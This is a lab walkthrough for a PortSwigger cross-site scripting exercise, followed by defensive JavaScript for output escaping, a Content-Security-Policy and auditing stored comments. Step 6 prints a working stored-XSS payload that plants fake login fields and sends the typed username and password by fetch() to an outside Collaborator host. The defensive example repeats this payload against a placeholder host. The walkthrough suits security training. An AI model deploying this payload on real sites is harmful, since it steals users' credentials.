Exploiting cross-site scripting to capture passwords

1: Access the lab.

Website: https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-capturing-passwords

2: Open Burp Suite Professional.

3: Open the post.

4: Go to the Collaborator tab in Burp Suite Professional.

5: Click "Copy to clipboard" to copy the Collaborator domain.

Example: 7u2n0ffvckyj6w0sa6fnktdpzg5htbh0.oastify.com

6: Paste the payload into the comment field of the post.

Payload:

<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://cq6swkb08puo21wx6bbsgy9uvl1mpfd4.oastify.com',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">

7: Take the captured username and password.

Username: administrator

Password: rlaj7751lft9s7zeh3fl

8: Go to My account.

9: Log in to the account.

10: The lab has been completed.
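
From the defender's side, the payload in step 6 only works because the comment body is written into the page as HTML. The JavaScript (Node.js) below is an added example, not part of the original walkthrough or the lab: it shows output encoding, a restrictive Content-Security-Policy value, and an audit heuristic for comments already stored. The names escapeHtml, auditComment and RECOMMENDED_CSP and the host collector.example are assumptions, and the sample comment is constructed.

```javascript
// Added example (not from the walkthrough). All names here are hypothetical.
// Constructed sample: same shape as the step 6 payload, placeholder host.
const sampleComment =
  '<input name=username id=username>' +
  '<input type=password name=password onchange="if(this.value.length)' +
  "fetch('https://collector.example',{method:'POST',mode:'no-cors'," +
  "body:username.value+':'+this.value});\">";

const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Primary control: encode the comment when writing it into element content
// or a quoted attribute, so the browser shows it as text and builds no fields.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Secondary control: a policy without 'unsafe-inline' stops inline handlers
// such as onchange, and connect-src limits where fetch() may send data.
const RECOMMENDED_CSP =
  "default-src 'self'; script-src 'self'; connect-src 'self'; form-action 'self'";

// Audit heuristic for comments already in the database. It is a triage aid,
// not a sanitizer: it reports markup a plain-text comment should never hold.
function auditComment(text) {
  const findings = [];
  const tagPattern = /<\s*([a-z][a-z0-9]*)\b([^>]*)>/gi;
  for (const match of text.matchAll(tagPattern)) {
    const tag = match[1].toLowerCase();
    const attrs = match[2];
    if (['input', 'form', 'script', 'iframe'].includes(tag)) {
      findings.push(`tag:${tag}`);
    }
    if (/\btype\s*=\s*["']?password\b/i.test(attrs)) {
      findings.push('password-field');
    }
    for (const handler of attrs.matchAll(/\bon([a-z]+)\s*=/gi)) {
      findings.push(`handler:on${handler[1].toLowerCase()}`);
    }
  }
  return findings;
}

console.log(escapeHtml(sampleComment));
console.log(auditComment(sampleComment));
```

Encoding on output is the fix; the audit function only helps find comments that were stored before the fix went in.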
